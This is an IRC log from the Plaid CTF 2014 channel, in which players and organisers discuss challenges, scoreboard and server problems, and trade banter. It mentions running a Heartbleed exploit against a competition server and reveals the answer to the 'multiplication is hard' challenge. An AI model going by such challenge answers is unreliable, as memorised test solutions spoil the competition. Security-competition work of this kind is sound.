(15:34:37) (marcan) but that was cute.
(15:34:42) (+cai_) grats :)
(15:34:59) jOin: (obriencd) (969cdb9b@gateway/web/freenode/ip.150.156.219.155)
(15:35:00) (dracu) i don't get the flag for misc10 - i mean i got it, but i don't get it, u know ? :D
(15:35:22) (obriencd) i didnt get it so i really dont get it
(15:35:27) (+cai_) if you got the flag, it would have accepted and gave you points!
(15:35:51) (anyny0) The number's important but have so many flag possibilites D=
(15:36:19) (dracu) i actually got the flag
(15:36:26) (dracu) and the points :)
(15:36:32) (+cai_) ah
(15:36:36) (dracu) but why was that the flag ?
(15:36:36) jOin: (pouete) (~pouete@unaffiliated/pouete)
(15:36:57) (+cai_) the process of getting that flag should've let you know?
(15:37:02) (dracu) yes
(15:37:39) (+cai_) then you understand why it is what it is :p
(15:38:05) (dracu) yeah... i was just amazed that it said "success"... (wtf?!)
(15:38:20) (+cai_) :)
(15:38:27) (dracu) fun, but hard ctf 4 n00bs
(15:38:31) mOde: (ChanServ) sets (+v frozencemetery)
(15:38:50) (asmoday) if this is rfc i will be very upset
(15:39:12) qUit: (hammerpig) (~user@gateway/tor-sasl/hammerpig) Ping timeout: 272 seconds
(15:39:27) (+cai_) yay over 10K submission \o/
(15:39:36) (+houqp) \o/
(15:39:54) qUit: (bloup_) (95acea33@gateway/web/freenode/ip.149.172.234.51) Quit: Page closed
(15:40:01) (tokki) lol
(15:41:08) jOin: (hammerpig) (~user@gateway/tor-sasl/hammerpig)
(15:41:14) (vooX) damn, the last stage of thes web-songs makes me crazy... :(
(15:42:05) qUit: (obriencd) (969cdb9b@gateway/web/freenode/ip.150.156.219.155) Ping timeout: 240 seconds
(15:45:32) (NK_) tylerni7: i feel like there is a disturbance in the force
(15:45:45) (NK_) the gameboard say our last submission was a day ago
(15:45:50) (+cai_) NK_: refresh?
(15:46:00) (NK_) same
(15:46:02) (+cai_) hmm
(15:46:17) (+cai_) cache flush refresh?
(15:46:31) (NK_) the scoreboard say 15 min though
(15:47:01) (+cai_) yeah, don't worry about it.. it's just there more for the styles/quick info, but things are correct in db
(15:47:02) (NK_) hm cache flush refresh say the same
(15:47:07) (+cai_) weird :/
(15:47:11) (NK_) yep
(15:47:21) (NK_) let's see on another browser just in case
(15:47:39) (vooX) btw, this year, web is pretty hard
(15:47:57) (NK_) same with another browser
(15:47:58) (+tylerni7) vooX: I think normally we don't have much web
(15:48:05) (+tylerni7) people asked for more web and forensics
(15:48:12) (NK_) yes it's good
(15:48:15) (+cai_) NK_: strange. it
(15:48:20) (+cai_) it's probably cache on our side then
(15:48:21) (+tylerni7) we gave them web and forenics that we thought were fun :)
(15:48:33) (+cai_) but yeah, i wouldn't worry about it
(15:48:36) (NK_) too much exploit / reverse in the past years
(15:48:39) (+cai_) thanks for letting us know tho
(15:48:42) (+tylerni7) NK_: :/
(15:48:55) (+tylerni7) we have more of those challenges too, they just aren't opened yet :P
(15:48:56) (NK_) tylerni7: i know not everyone aggree with this :p
(15:49:06) (mrsmith67) can anyone help me with multipliation?
(15:49:12) (mrsmith67) i know it has to do with time...
(15:49:19) (+tylerni7) mrsmith67: multiplication is hard
(15:49:23) (+tylerni7) you should have a computer do it
(15:49:27) (NK_) addition, multiplication and division is hard
(15:49:31) (NK_) according to the past years
(15:50:08) (+cai_) math is hard
(15:51:12) (pouete) as a question : on __nightmares__ have really nothing to do with pyjail ?
(15:51:16) (+cai_) NK_: you can guess what will be on next year :)
(15:52:06) (tokki) call you my everything~
(15:52:33) (pouete) ( just tried to call ().__nighmares__ . was not disapointed O )
(15:52:39) (tokki) :O
(15:52:59) nIck: (Zoro) is now known as (awrign)
(15:53:03) (tokki) me no getz misc 10
(15:53:08) (tokki) this is sad
(15:53:25) (Pitr_) I get it but only after someone explained it to me 8)
(15:53:47) qUit: (nullProtectorate) (
[email protected]) Remote host closed the connection
(15:53:55) nIck: (awrign) is now known as (armerichigo)
(15:54:03) nIck: (armerichigo) is now known as (americhigo)
(15:54:08) (tokki) hmm
(15:54:14) (asmoday) ok seriously for curl, is this a DEP or Reverse
(15:54:30) (+tylerni7) what do you mean DEP?
(15:54:42) (+tylerni7) anyway, it's forensics
(15:54:42) (tokki) DEPRESSION
(15:54:47) (asmoday) sorry dpe, deep packet inspect
(15:54:50) (dct1) johnny DEP
(15:54:55) (tokki) LOL
(15:54:57) (americhigo) that would be dpi
(15:55:14) qUit: (n00b13) (~n00b13@unaffiliated/nitsua)
(15:55:23) (asmoday) said the guy who has slept ;p ha
(15:55:47) jOin: (bwn3r) (~n00b13@unaffiliated/nitsua)
(15:56:11) nIck: (americhigo) is now known as (Zoro)
(15:57:04) (Zoro) `-`
(15:57:53) (asmoday) is it in the tcpdump or the memory
(15:58:14) (Apple_Eater) I had a question with kpop -- just wanted to see if I am on the right track. Anyone around?
(15:58:21) (Pitr_) it's DERP
(15:58:24) (+tylerni7) Apple_Eater: you can pm me
(15:58:27) (tokki) *gasp*
(15:58:27) (Apple_Eater) Thanks
(15:58:32) (tokki) DERP!!!
(15:59:03) (ShortKidd) tyler, are you ever not here?
(15:59:20) (tokki) is misc 10 like a nonsense question
(15:59:20) (asmoday) this damn game had me questioning 65535 how dare you
(15:59:21) (WhizzMan) urgh, multiplication *is* hard
(15:59:32) (tokki) like the answer should be like unicorns or something
(15:59:48) (killobyte) hi, who can i ask about whatscat task?
(15:59:52) (+tylerni7) killobyte: me
(15:59:53) (+tylerni7) pm
(16:00:02) (ShortKidd) the heartbleed one, tokki?
(16:00:13) (tokki) the multiplication one :p
(16:00:26) (ShortKidd) oh lol
(16:00:32) mOde: (ChanServ) sets (+o cai_)
(16:00:33) jOin: (Frisk0) (~Frisk0@2601:7:9e00:8f:ed6f:4299:1327:d3fe)
(16:00:42) tOpic: (cai_) changes topic to ([Plaid CTF 2014 - play.plaidctf.com] 24 Hours left | $10 added to each cash prizes so far (from CHANCE card))
(16:00:42) (tokki) *gasp* cai is op!
(16:00:43) (cybertech) the mutiplication one is not working
(16:00:47) (tokki) lol
(16:00:52) (cybertech) i found the answer is wont take it
(16:00:57) mOde: (ChanServ) sets (-o cai_)
(16:01:07) (tokki) lol
(16:01:10) (subsnake) xD
(16:01:11) (Pitr_) cybertech, try querying an admin
(16:01:16) (tokki) xD
(16:01:19) (cybertech) hmm
(16:01:25) (cybertech) no admins on here
(16:01:34) (asmoday) cybertech its not 65535
(16:01:38) (shadghost) admins are 'voiced' here
(16:01:40) (cybertech) hmm
(16:01:41) (tokki) lol
(16:01:45) (subsnake) nor unicorn
(16:01:54) (cybertech) i thought that was the answer
(16:01:55) (tokki) damn!
(16:02:07) (tokki) i was submitting unicorns!
(16:02:08) (+cai_) cybertech: it will take it when you have the correct answer
(16:02:15) (asmoday) think outside that box
(16:02:17) (cybertech) ok
(16:02:29) (Yerer) Oh haha
(16:02:44) (Yerer) I'm surprised that was the answer for misc10
(16:03:20) (+cai_) :)
(16:03:23) qUit: (Bijan-E) (~bijan-e@unaffiliated/bijan-e) Quit: Leaving
(16:03:33) qUit: (T1mb0) (
[email protected]) Quit: HydraIRC -> http://www.hydrairc.com <- Organize your IRC
(16:03:51) jOin: (shortkidd_) (60279873@gateway/web/freenode/ip.96.39.152.115)
(16:04:23) (WhizzMan) I can't even see a box
(16:04:25) jOin: (kiwhacks) (~kiwhacks@2a01:e35:87ea:8920:6a5d:43ff:fe86:f128)
(16:04:53) (asmoday) You will punch yourself after knowing the answer
(16:05:01) (WhizzMan) oh I'm sure I will
(16:05:02) (asmoday) like really hard
(16:05:05) (NK_) :)
(16:05:29) (tokki) D:
(16:05:47) (asmoday) I will kick a baby, luckily none are near me ever, after I get the answer to a few of these
(16:05:58) (asmoday) Dramatic over thinking happens at defcon every year
(16:06:13) (tokki) D:
(16:06:14) (WhizzMan) puppies and kittens will be good supplicants
(16:06:31) (pouete) I would like to know if i am on the right track, should i ask my question on the public chan ?
(16:06:37) (+tylerni7) pouete: pm me
(16:06:47) (+tylerni7) may not be able to answer
(16:06:48) (+tylerni7) but yeah
(16:07:00) (tokki) THE PLAGUEEEEEE
(16:07:05) qUit: (ShortKidd) (60279873@gateway/web/freenode/ip.96.39.152.115) Ping timeout: 240 seconds
(16:07:14) nIck: (shortkidd_) is now known as (ShortKidd)
(16:07:25) (WhizzMan) Yersinia
(16:08:33) tokki depresses over the scoreboard
(16:09:10) (Gynvael) agreed
(16:09:14) (ShortKidd) let's be depressed together
(16:09:16) (Gynvael) eb huh
(16:10:10) (+tylerni7) Gynvael: you guys got time :)
(16:10:15) (+tylerni7) btw which of you solved rsa?
(16:10:22) (Gynvael) adam_i
(16:10:23) (+cai_) Nice
(16:10:41) (+tylerni7) ooo curlcore solve
(16:10:41) (+tylerni7) nice
(16:10:52) (+cai_) 0xffa
(16:11:06) (+cai_) the vote begins :)
(16:11:11) (tokki) *gasp*
(16:11:15) (poppopret) anyone wanna push me in the right direction for web150? =/
(16:11:17) qUit: (poppopret) (
[email protected]) Remote host closed the connection
(16:11:25) (Gynvael) yeah
(16:11:40) (Gynvael) protip for web150: staying on IRC after asking question ftw
(16:11:44) (tokki) MUST VOTEZ 1
(16:11:47) (+tylerni7) heh
(16:11:49) (shadghost) lol
(16:11:49) (asmoday) FUCK wanted the be the first curlcore
(16:11:56) (poppopret) lol it crashed
(16:12:00) (poppopret) back
(16:12:02) (tokki) that's sad
(16:12:07) (+tylerni7) poppopret: pm me I guess
(16:12:38) (iZsh) i got curlcore \o/ :)
(16:12:42) (tokki) poppopret: our team member has a similar nickname, haha
(16:12:44) (tokki) congrats xD
(16:12:48) (bool_101) grats
(16:13:33) (iZsh) reaching 48h without sleep in a few hours, meh
(16:14:03) jOin: (dedede) (d4293493@gateway/web/freenode/ip.212.41.52.147)
(16:14:07) (kiwhacks) what is the format of misc10 multiplication response ?
(16:14:23) (+cai_) kiwhacks: number
(16:14:26) (+cai_) int
(16:14:29) (Zoro) ZOMBIE
(16:14:30) (+tylerni7) \d+
(16:14:33) (kiwhacks) ok thanks
(16:14:57) (subsnake) NUMBER?
(16:14:58) (subsnake) !
(16:15:20) (+tylerni7) ?
(16:15:25) (+cai_) i mean, you are multipyling two numbers, what did you expect :p
(16:15:36) ([ToH]bp) 42
(16:15:45) (subsnake) unicorn works just fine
(16:15:49) (Zoro) that's not how it works
(16:15:51) (tokki) guys if there are like no hints till the end of the ctf, wat happens :O
(16:15:52) (Adran) not invalid flag? :P
(16:16:08) (WhizzMan) "unknown flag"
(16:16:17) (Adran) the same thing happens whether there are hints or no hints, the winner(s) win :>
(16:16:23) (tokki) this misc should at least be 100 points
(16:16:24) (+tylerni7) well, keep in mind that multiplication is hard
(16:16:25) (WhizzMan) What, no recount?
(16:16:26) (tokki) ^true
(16:16:26) (Adran) and everyone learns something.
(16:16:34) (iZsh) tokki: problem with hints is that it kills the scoreboard :)
(16:16:37) (+tylerni7) WhizzMan: multiplication is hard, man
(16:16:40) (tokki) :D
(16:16:53) (WhizzMan) yeah, it is
(16:16:55) (tokki) tylerni7: it is this prob is killing our team
(16:17:20) (+tylerni7) maybe you should do another problem then :)
(16:17:21) (WhizzMan) tokki: pics!
(16:17:22) (Yerer) tokki: Try multiplying them
(16:17:30) (tokki) lol
(16:17:58) (tokki) hmm
(16:18:19) (hellman) open pls more crypto (and other tasks) until morning :)
(16:18:25) (Luffy) uh
(16:18:32) (Luffy) is multiplication is hard broken
(16:18:35) (+tylerni7) Luffy: no
(16:18:38) (NK_) oh
(16:18:41) (Luffy) cuz im sure i multiplied them correctly
(16:18:43) (+cai_) Luffy: it's working fine :)
(16:18:49) (NK_) nooo
(16:18:52) (WhizzMan) Luffy: it's hard, that's why
(16:18:57) (NK_) this curl is linked to openssl1.0.1e
(16:18:57) (Luffy) i feel you guys snickering
(16:18:57) (+cai_) well, it's hard, so some people couldn't
(16:19:30) jOin: (haoz) (b44ac723@gateway/web/freenode/ip.180.74.199.35)
(16:20:00) (haoz) a
(16:20:18) jOin: (wolfpack) (9807491f@gateway/web/freenode/ip.152.7.73.31)
(16:20:31) (tokki) D:
(16:20:32) (ShortKidd) b
(16:20:39) (haoz) multiplication is hard ?
(16:20:43) (Zoro) http://www.icons-land.com/images/products/VistaFlagsIconsPreview_Flag1.jpg
(16:20:54) (Zoro) That's what Misc 10 feels like
(16:21:01) (tokki) multiplication is hard.
(16:21:14) (Adran) error: cannot divide by zero
(16:21:26) (whos_tyler) Zoro: I dont get the joke
(16:21:49) (Zoro) have you done misc 10 yet?
(16:21:57) (whos_tyler) I have
(16:22:00) (whos_tyler) still dont get it
(16:22:04) (haoz) i dun get the flag :p
(16:22:28) (duckyTS) misc10 is probably something stupid
(16:22:44) (nullProtectorate) loł
(16:22:50) (tokki) lol
(16:22:56) (livinded) 101
(16:22:57) (asmoday) some middleschooler is laughing
(16:23:11) (tokki) i love how people are like, I solved it but i dont get it
(16:23:12) (nullProtectorate) łøł
(16:23:29) qUit: (vooX) (4e81ae54@gateway/web/freenode/ip.78.129.174.84) Quit: Page closed
(16:23:59) (haoz) mind to give some hints ? :p
(16:24:06) (kmowery) proofs of work :|
(16:24:08) (WhizzMan) for a 10 pt challenge? pfff
(16:24:27) (haoz) :X
(16:24:54) (WhizzMan) I'm not getting it either, but come on, it's a 10 point challenge
(16:25:01) (anyny0) Lol
(16:25:22) (x_x) This 10 point challenge is mocking me.
(16:25:30) (WhizzMan) yes :)
(16:25:31) (x_x) Much like my Calculus III grade.
(16:25:32) (x_x) Y_Y
(16:25:38) (WhizzMan) you and plenty of other people
(16:25:43) (Luffy) um
(16:25:49) (Luffy) is back and time a typo
(16:25:54) (Luffy) did you guyes mean back in time
(16:25:57) (x_x) Nope, it's a hint.
(16:26:03) (Luffy) it is?
(16:26:10) (x_x) Maybe?
(16:26:11) (+tylerni7) Luffy: that's a typo
(16:26:11) (+tylerni7) :P
(16:26:16) (Luffy) oh
(16:26:17) x_x sniffles.
(16:26:19) (x_x) I hoped it was a hint.
(16:26:24) (Luffy) youre dumb
(16:26:27) (+tylerni7) Luffy: which problem?
(16:26:27) (Luffy) go away
(16:26:28) qUit: (be) (ac17cef9ca@gateway/web/cgi-irc/kiwiirc.com/x-krbszdhddwaqbbzd) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
(16:26:40) (Luffy) was talking about multiplication is hard
(16:26:43) (x_x) Multiplication is hard.
(16:27:10) (+tylerni7) there, it should say "back in time" now
(16:27:11) (shadghost) 1*1=1 , see i can multiply
(16:27:13) (Adran) man its like a chant
(16:27:56) (+cai_) voting ends in 12
(16:28:02) (namrog84) the flag isn't a number is it
(16:28:02) (tokki) ooh
(16:28:22) (tokki) they've told me it is an 'int' form
(16:28:26) (tokki) but are you guys sure
(16:28:34) (+cai_) namrog84: it is, for multiplication is hard problem
(16:28:58) (WhizzMan) so no flag{12324} but just 12324 ?
(16:29:28) (bwn3r) can anyone help me with 150 ? :'(
(16:29:32) (bwn3r) web
(16:29:36) tokki goes to corner, checks calculator and cries
(16:30:09) (Pitr_) May I complo
(16:30:19) (+cai_) WhizzMan: yeah, you shouldn't see flag{}.
(16:30:20) (Pitr_) May I compliment the creator of misc10 :D
(16:30:30) (sqall) much time consuming
(16:30:31) (sqall) such depression
(16:30:31) (sqall) very unwow :/
(16:30:50) (kurtisebear) its making me want to kill myself Im sure I need to think out the box a little but its been annoying me for like 30 mins now
(16:30:51) (WhizzMan) no amaze
(16:30:57) (tokki) ikr
(16:31:12) (x_x) It's both funny, and sad.
(16:31:51) jOin: (hkr`) (~hkr@unaffiliated/hkr/x-6459160)
(16:31:54) jOin: (LMolr) (89ccb77e@gateway/web/freenode/ip.137.204.183.126)
(16:32:06) (n00bz) lol voox
(16:32:19) (LMolr) hints for tenement ??
(16:32:29) (LMolr) i am trying hard
(16:32:41) (LMolr) plz admi
(16:32:50) (_ariel) hey guys, i have a problem with reverse 250 (hudak), i have found a key (without patching an app), i get congratz and that's all?
(16:33:23) (+cai_) _ariel: you can pm me the key you found
(16:33:25) (WhizzMan) you want a medal?
(16:33:50) (n00bz) any help for web300?
(16:33:53) (tokki) a gold medal!
(16:35:45) (+cai_) 4 minutes left for voting
(16:36:52) (kurtisebear) and finaly got misc10
(16:37:21) (mak) To confirm, for reekee you need code execution to be able to find the flag, right?
(16:38:22) qUit: (InternalCumBustI) (43a49c58@gateway/web/cgi-irc/kiwiirc.com/ip.67.164.156.88) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
(16:38:45) (Hertz_) right mak
(16:39:35) qUit: (ShortKidd) (60279873@gateway/web/freenode/ip.96.39.152.115) Ping timeout: 240 seconds
(16:40:16) (Phshap) damn
(16:40:19) (+cai_) ##### CHANCE Card: $10 added to the pot again
(16:40:23) (+cai_) no hints :'(
(16:40:26) (Phshap) :)
(16:40:30) (Phshap) i mean :(
(16:40:33) mOde: (ChanServ) sets (+o cai_)
(16:40:34) (Phshap) very L(
(16:40:39) (x_x) booo money
(16:40:51) (Phshap) who needs money
(16:40:56) tOpic: (cai_) changes topic to ([Plaid CTF 2014 - play.plaidctf.com] 24 Hours left | $20 added to each cash prizes so far (from CHANCE card))
(16:41:05) mOde: (ChanServ) sets (-o cai_)
(16:42:22) (Pitr_) Chance should have a 'valuta change to BTC' card
(16:42:39) ([ToH]bp) dogecoin or bust
(16:43:54) (WhizzMan) to the moon
(16:44:11) (WhizzMan) Pitr_: 'currency change to MTGOX BTC'
(16:45:09) (+cai_) web is opened
(16:45:21) (bobsteam) question on reekee >.>
(16:45:44) (iago-x86) Hey, can I ask somebody a question about whatscat?
(16:45:52) (+tylerni7) iago-x86: sure
(16:45:56) (+tylerni7) I just refreshed the db
(16:45:58) (_blasty_) is new web supposed to give 500 err ?
(16:46:07) (+tylerni7) _blasty_: ... probably not h/o
(16:46:09) (halfvollemelk) multiplication is hard...
(16:46:26) (grimmlin_) crash double free:
(16:46:35) (mongo12) five double oh!!
(16:46:36) (grimmlin_) arf, wrong window
(16:46:37) (Adran) is halphow2js supposed to be giving 500?
(16:46:41) (+tylerni7) h/o
(16:46:43) (mongo12) call the nine one one
(16:46:55) (tokki) am I still online?
(16:46:55) (_blasty_) internet pwn-lice
(16:47:13) (jduck) q/uit 502 Bad Gateway
(16:47:14) (jduck) oops
(16:47:20) (tokki) lol
(16:47:28) (shadghost) Burp proxy error: Failed to connect to 54.196.246.17:8001
(16:47:50) (mischa__) halphow2js down?
(16:48:51) (namrog84) 65
(16:48:59) (+tylerni7) ok
(16:49:05) qUit: (cybertech) (4432fdee@gateway/web/freenode/ip.68.50.253.238) Ping timeout: 240 seconds
(16:49:06) jOin: (shortkidd) (60279873@gateway/web/freenode/ip.96.39.152.115)
(16:49:06) (+tylerni7) HALPHOW2JS IS RUNNING NOW
(16:49:16) (acez) who can I ping for kappa
(16:49:24) (Im11Plus) Web 200 easy
(16:49:31) (Im11Plus) Gives you flag, such wow
(16:49:41) (haoz) multiplication is hard...
(16:49:48) (namrog84) multiplication is hard...
(16:49:49) (anyny0) Indeed
(16:49:59) (namrog84) just stick it in calculator, made easy!
(16:50:06) (tokki) D:...
(16:50:11) (tokki) its hard..
(16:50:23) qUit: (nullProtectorate) (
[email protected]) Remote host closed the connection
(16:50:48) (haoz) something wrong with my calculator ? :(
(16:50:49) jOin: (asdfasdfasdfasdf) (4738ed75@gateway/web/freenode/ip.71.56.237.117)
(16:50:55) (namrog84) probably
(16:51:03) (namrog84) do you have CTF mode enabled?
(16:51:16) (tokki) lol
(16:51:22) (haoz) lolll....
(16:51:26) (x_x) The batteries on my TI died. Cannae enter it into CTF mode.
(16:51:39) (tokki) TI's eat a lot of batteries
(16:51:45) (x_x) They really do.
(16:51:50) nIck: (Zoro) is now known as (aobugw4uob49tt34)
(16:51:56) (tokki) and they are goddamn expensive, heavy,
(16:52:01) (halfvollemelk) I'm sure I multiplied it correctly...
(16:52:05) nIck: (aobugw4uob49tt34) is now known as (Zoro)
(16:52:06) (tokki) and yet my scholl makes us buy them..
(16:52:32) (trelgak) can anyone push me in the right direction for reversing200? been working on it for forever..
(16:52:59) (x_x) I want one of those newer CAS models. They have fancy pants 3D graphing.
(16:53:23) (Im11Plus) lul web 200 end.response
(16:53:49) (tokki) x_x: rly?! oh god technology
(16:54:04) (x_x) Delicious technology
(16:54:08) (shortkidd) reverse it, trel
(16:54:25) (Zoro) http://play.plaidctf.com/files/g++-30f6a74ce24ea3605ba7cbec92222a72.tar.bz2 - nginx 404 Not Found.
(16:54:31) (x_x) Refresh a few times.
(16:54:39) (x_x) It'll get there eventually.
(16:54:44) qUit: (poppopret) (
[email protected]) Remote host closed the connection
(16:55:28) (trelgak) can anyone help me answer a question i have about reversing 200?
(16:56:11) (WhizzMan) Heh, multiplication is hard is funnier than you'd think, especially if you know why the answer is what it is
(16:56:21) (Luffy) ya
(16:56:29) (Luffy) its funny :)
(16:56:30) (+cai_) WhizzMan: :
(16:56:32) (+cai_) :)*
(16:56:43) (+tylerni7) trelgak: perhaps
(16:56:43) (x_x) This is just getting cruel.
(16:56:45) (+tylerni7) you can pm
(16:56:54) (x_x) Like every math professor I've ever had.
(16:56:57) (x_x) >_>
(16:57:22) (haoz) :|
(16:57:55) (halfvollemelk) jo, wtf is this sorcery
(16:58:07) (halfvollemelk) suddenly I check my scoreboard and multiplication is solved
(16:58:29) (Adran) suddenly math is hard
(16:58:40) (halfvollemelk) suddenly i'm even more confused
(16:58:43) ([ToH]bp) Infinity - object > []?
(16:58:45) (tokki) D:....
(16:59:09) (tokki) i still dont get the multiplication is hard
(16:59:14) (tokki) its hard
(16:59:20) (LMolr) i dont get crypto 20
(16:59:23) (LMolr) :/
(16:59:27) (tokki) :/
(16:59:33) (WhizzMan) halfvollemelk: playing with more people on your team?
(16:59:38) (tokki) lol
(16:59:48) (haoz) my mathssss....
(17:00:02) (LMolr) maybe i am """special"""
(17:01:37) (Adran) computers are hard, time to pack my bags
(17:03:03) (deject3d) crypto 20 is one of the simplest ciphers
(17:03:06) (tokki) wat
(17:03:08) (tokki) wat?!
(17:03:10) (tokki) wat?!?!?
(17:03:33) (Lopi) who can I pm with a question regarding a challenge?
(17:03:35) (Adran) it was pretty easy
(17:03:39) (+tylerni7) Lopi: me
(17:04:23) (kiwhacks) misc10 makes me crazy...
(17:04:48) (namrog84) ditto
(17:04:48) (tokki) lol ya
(17:05:00) (Luffy) nah
(17:05:03) (Luffy) theyre pretty easy
(17:05:14) (Luffy) just gotta think outside the box
(17:05:24) (namrog84) im so far outside the box, i dont even know where the box was
(17:05:35) (livinded) is reekee getting hammered?
(17:05:41) (Adran) I've stretched out the box so much its now a circle
(17:05:54) (deject3d) reekee sux
(17:07:25) (namrog84) 38.55 * 1700
(17:07:33) (namrog84) oops
(17:07:51) (shadghost) namrog84: copy past is also hard?
(17:08:14) (namrog84) yes, I am clearly an incapable of normal computer operations
(17:08:27) (namrog84) can't even construct a sentence correctly either
(17:08:34) (shadghost) so, now is the time to try the fucke dup challanges right
(17:08:58) (dkohlbre) is kappa supposed to take as much CPU as watching twitch does? Its making my laptop takeoff :/
(17:09:10) (tokki) asdfasdfasdfasfdafsadf
(17:11:05) qUit: (shortkidd) (60279873@gateway/web/freenode/ip.96.39.152.115) Ping timeout: 240 seconds
(17:11:32) qUit: (anyny0) (6babd56d@gateway/web/cgi-irc/kiwiirc.com/ip.107.171.213.109) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
(17:12:34) jOin: (Anyny0) (6babd56d@gateway/web/cgi-irc/kiwiirc.com/ip.107.171.213.109)
(17:12:36) (iago-x86) dkohlbre: It shouldn't
(17:12:42) (tokki) twitch pokemon!
(17:12:44) (namrog84) woo!! Got multiply is hard!
(17:12:57) (namrog84) <- idiot
(17:13:05) (tokki) did you get key?
(17:13:23) (namrog84) yep :D
(17:13:31) (tokki) holy shet, i should be working on it harder
(17:13:34) (dvddaver) Anybody solved ezhp?
(17:13:39) (namrog84) now back to the awful web150
(17:13:53) (Ymgve) dvddaver: only 58 teams
(17:14:33) (haoz) im the another idiot >.<
(17:14:50) (asmoday) dogestege is that one where I have to find the same image online
(17:15:04) (haoz) namrog84 : mind to ...... ? :p
(17:15:41) (LMolr) tenement owns me
(17:15:44) (tokki) 38.55 * 1700 is freaking 65535
(17:15:52) (asmoday) hhahaha
(17:15:55) (namrog84) :D
(17:16:00) (tokki) :D
(17:16:03) (tokki) :D....
(17:16:11) (namrog84) ...... there it is, i typed it in, but i think the channel blocks flags :D
(17:16:21) (Adran) anyone willing to answer a question about a puzzle/hunt?
(17:16:29) (namrog84) just like passwords: ********
(17:16:31) (acez) tylerni7: who can I ping for kappa ?
(17:16:35) (Ymgve) tokki: it's not a 1 pointer
(17:16:51) (tokki) :D
(17:16:57) (supersat) man... I love paris. mov eax, 0 mov eax, [eax]
(17:17:00) (supersat) luuuuulz
(17:17:01) (+dickoff) acez: me
(17:17:06) (n00bz) web300 is down
(17:18:02) (tokki) :D
(17:18:54) jOin: (pctf376) (46b9d762@gateway/web/freenode/ip.70.185.215.98)
(17:19:18) (tokki) c ya guyz tomz
(17:19:19) (tokki) living in a different timezone, i think im gonna go sleep
(17:19:30) (tokki) xD
(17:19:45) qUit: (T1mb0) (
[email protected]) Quit: HydraIRC -> http://www.hydrairc.com <- Nine out of ten l33t h4x0rz prefer it
(17:19:46) (haoz) its 6.20am here
(17:19:48) (dct1) pfshs sleep, excuses
(17:19:50) (WhizzMan) namrog84: hunter7
(17:20:51) qUit: (halfvollemelk) (589f763c@gateway/web/freenode/ip.88.159.118.60) Quit: Page closed
(17:21:53) (inter) welllll
(17:21:55) (inter) that econ midterm
(17:21:57) (inter) FUCKkkk
(17:22:55) (namrog84) WhizzMan how do you know my password?!
(17:22:59) (namrog84) :P
(17:23:35) qUit: (tokki) (d9a5709e@gateway/web/freenode/ip.217.165.112.158) Ping timeout: 240 seconds
(17:24:37) qUit: (asdfasdfasdfasdf) (4738ed75@gateway/web/freenode/ip.71.56.237.117) Quit: Page closed
(17:25:17) (haoz) i need maths tuition...seriously... lol
(17:26:11) jOin: (Aristokratov) (80d3c245@gateway/web/freenode/ip.128.211.194.69)
(17:29:36) (dvddaver) Can anybody give me a ping on ezhp?
(17:29:47) qUit: (awreece) (~awreece@unaffiliated/awreece) Ping timeout: 240 seconds
(17:30:05) qUit: (sorin_) (5e34c7a9@gateway/web/freenode/ip.94.52.199.169) Ping timeout: 240 seconds
(17:31:14) jOin: (shortkidd) (60279873@gateway/web/freenode/ip.96.39.152.115)
(17:32:35) (netsurf3) anyone mind me pm'ing them about multiplication is hard?
(17:32:50) jOin: (DuhJangOh) (406a2765@gateway/web/cgi-irc/kiwiirc.com/ip.64.106.39.101)
(17:33:02) (javex) who to query for rendezvous?
(17:33:29) (netsurf3) been looking at that one myself... pain in the arse
(17:33:34) (+tylerni7) javex: houqp
(17:34:50) (deject3d) django sucks
(17:34:56) (+tylerni7) hah
(17:35:10) (deject3d) i am reading the git source and the comment is inconsistent with what the example says
(17:35:21) (deject3d) how do these god damn cookies work
(17:35:37) (shortkidd) you eat them
(17:35:56) jOin: (lollip) (89ccb77e@gateway/web/freenode/ip.137.204.183.126)
(17:36:23) qUit: (alamar) (alamar@2a02:180:a:1:1::110) Ping timeout: 240 seconds
(17:36:38) jOin: (lstamour_) (18699342@gateway/web/freenode/ip.24.105.147.66)
(17:36:47) (Adran) who can i message about web150?
(17:36:54) (tomcr00se) dude i love javascript
(17:36:58) (+tylerni7) nice
(17:37:13) (lollip) any hint for halphow2js ?
(17:38:06) (shortkidd) use javascript
(17:38:18) nIck: (alamar) is now known as (Guest7603)
(17:38:25) (Anyny0) Damn, thought it was sql!
(17:38:31) (shortkidd) Well now you know!
(17:39:45) (Zoro) which problem is halphow2js?
(17:40:22) (inter) tomcr00se: wut is javascript :britishface:
(17:40:37) (x_x) I'm not that good with java.
(17:40:42) (LMolr) pwned tenment
(17:40:50) (LMolr) die
(17:40:54) (+ricky) Woo, my super cool problem is almost done
(17:40:59) (+ricky) Hopefully it's solvable in <24 hours
(17:41:03) (Ymgve) Zoro: leftmost on the second page
(17:41:08) (inter) ricky: which problem
(17:41:10) (inter) is yourserino
(17:41:24) (kmowery) does wheeeee have a line length limit
(17:41:45) (+tylerni7) kmowery: yeah there is a max amount you can send it
(17:41:53) (+ricky) inter: It's not on the board yet
(17:42:02) (DuhJangOh) so i dont understand why heartbleed isnt exploiting
(17:42:06) qUit: (paul_55) (b4f91af3@gateway/web/freenode/ip.180.249.26.243) Quit: Page closed
(17:42:29) (DuhJangOh) we run it on https://54.82.147.138:45373 (the one provided in the problem), right?
(17:42:54) (kmowery) tylerni7: is that known or should i keep binary searching it?
(17:43:07) (haoz) someone plz.. multiplication is harddd... :|
(17:43:32) (shortkidd) DuhJangOh: I just tried it again, and it's still exploiting
(17:43:34) (+tylerni7) kmowery: it's not known.. shouldn't be too important
(17:44:09) (kmowery) tylerni7: huh, alright
(17:44:39) (+tylerni7) DuhJangOh: hm we have it set up on other ports as well
(17:46:49) (+tylerni7) DuhJangOh: it might be crashed I'm looking at it now
(17:47:29) (DuhJangOh) what ports? i just did an nmap scan and it said it was down
(17:47:35) (DuhJangOh) might be my kali copnnection though
(17:47:43) (+tylerni7) server seems sad, I'm looking into it
(17:48:56) (pd7) heartbleed seems to be up and working for me
(17:49:06) (+tylerni7) I couldn't ssh to it just now
(17:49:09) (+tylerni7) imma reboot
(17:49:18) (pd7) well the exploit works
(17:49:23) (shortkidd) Same here
(17:49:58) (+tylerni7) weird
(17:50:45) (shortkidd) what other ports is it open on?
(17:50:48) (shortkidd) still the 10k-11k?
(17:51:17) (+tylerni7) yeah, but I"m rebooting it now
(17:51:21) (shortkidd) alright
(17:52:12) nIck: (Guest7603) is now known as (alamar)
